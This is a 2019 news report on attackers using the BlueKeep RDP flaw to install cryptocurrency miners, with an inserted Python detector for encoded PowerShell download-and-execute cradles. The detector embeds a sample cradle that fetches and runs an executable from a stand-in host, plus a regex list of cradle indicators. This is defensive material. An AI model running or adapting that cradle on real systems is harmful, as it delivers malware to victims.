5 November 2019

Hackers using BlueKeep remote desktop security flaw to install cryptocurrency miners on vulnerable PCs

Security researchers have detected the first mass-hacking campaign using the BlueKeep flaw in the Windows operating system to infect computers with a cryptocurrency miner. The good news is that the exploit is not being leveraged as a self-propagating worm, as Microsoft cautioned back in May when it issued a patch urging users to update their systems; rather, the attacks appear to be an opportunistic endeavor in pursuit of monetary gain.

Security researcher Beaumont detected a spike in attacks exploiting the BlueKeep vulnerability, but rather than taking remote control of the machines, the attackers were causing them to crash. According to Beaumont, the attacks began on October 23.

Beaumont’s discovery was confirmed by security expert Marcus "MalwareTech" Hutchins. According to Hutchins’ blog post, the attackers were using a demo BlueKeep exploit released by the Metasploit team back in September to compromise Windows systems and install a Monero cryptocurrency miner.

"Finally, we confirm this segment [in crash dump] points to executable shellcode. At this point, we can assert valid BlueKeep exploit attempts in the wild, with shellcode that even matches that of the shellcode in the BlueKeep Metasploit module!" Hutchins said.

The analyzed exploit contained encoded PowerShell commands as the initial payload, which downloaded the final malicious executable binary from a remote attacker-controlled server and executed it on the targeted systems.
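Detection logic for the encoded-PowerShell stage described above, as an added example that is not taken from the article or from the researchers' reports: it pulls the `-EncodedCommand` argument (base64 of UTF-16LE text) out of process-creation log lines, decodes it, and flags download-and-execute indicators. The pipe-separated log format, the sample lines, the indicator list and the `example.invalid` host are all constructed assumptions.

```python
"""Flag encoded PowerShell download-and-execute cradles in process-creation logs."""
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple

# Indicators that a (decoded) command fetches and runs a remote binary.
# Names are ours; the regexes match common cmdlets and .NET calls.
CRADLE_INDICATORS: Dict[str, str] = {
    "webclient": r"Net\.WebClient",
    "downloadfile": r"DownloadFile",
    "downloadstring": r"DownloadString",
    "invoke-webrequest": r"Invoke-WebRequest",
    "invoke-expression": r"Invoke-Expression|\bIEX\b",
    "start-process": r"Start-Process",
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; -e/-ec/-enc are the usual ones.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if cmdline carries a valid -EncodedCommand, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        # Malformed base64 or non-UTF-16 payload: treat as not decodable.
        return None


def classify(cmdline: str) -> dict:
    """Check the decoded script (or the raw command line) for cradle indicators."""
    decoded = decode_encoded_command(cmdline)
    text = decoded if decoded is not None else cmdline
    hits = [name for name, pat in CRADLE_INDICATORS.items()
            if re.search(pat, text, re.IGNORECASE)]
    return {"encoded": decoded is not None, "decoded": decoded,
            "indicators": hits, "suspicious": bool(hits)}


def scan_logs(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (pid, indicators) for every suspicious line; format is 'pid|image|cmdline'."""
    findings = []
    for line in lines:
        pid, _image, cmdline = line.split("|", 2)
        result = classify(cmdline)
        if result["suspicious"]:
            findings.append((int(pid), result["indicators"]))
    return findings


def make_encoded(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (used to build samples)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample: one download-and-execute cradle, two benign uses, one malformed flag.
CONSTRUCTED_CRADLE = (
    "$c=New-Object Net.WebClient;"
    "$c.DownloadFile('http://example.invalid/m.exe','C:\\Users\\Public\\m.exe');"
    "Start-Process 'C:\\Users\\Public\\m.exe'"
)
SAMPLE_LOGS = [
    "4412|powershell.exe|powershell.exe -NoP -W Hidden -enc " + make_encoded(CONSTRUCTED_CRADLE),
    "5120|powershell.exe|powershell.exe -enc "
    + make_encoded("Get-Date; Get-Service | Where-Object Status -eq 'Running'"),
    "5301|powershell.exe|powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "5407|powershell.exe|powershell.exe -enc notbase64!!",
]

if __name__ == "__main__":
    for pid, indicators in scan_logs(SAMPLE_LOGS):
        print(f"pid {pid}: suspicious encoded PowerShell, indicators={indicators}")
```

Only the first sample line is reported; the benign encoded command, the plain `-File` invocation and the malformed base64 all pass through without a hit, which keeps the rule usable on hosts where administrators legitimately use `-EncodedCommand`.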

Hutchins also confirmed that this hacking operation doesn’t include self-spreading, worm-like capabilities. Instead, it appears that the attackers are scanning the internet in search of vulnerable Windows machines with exposed RDP ports, deploying the BlueKeep exploit, and then installing a cryptocurrency miner.

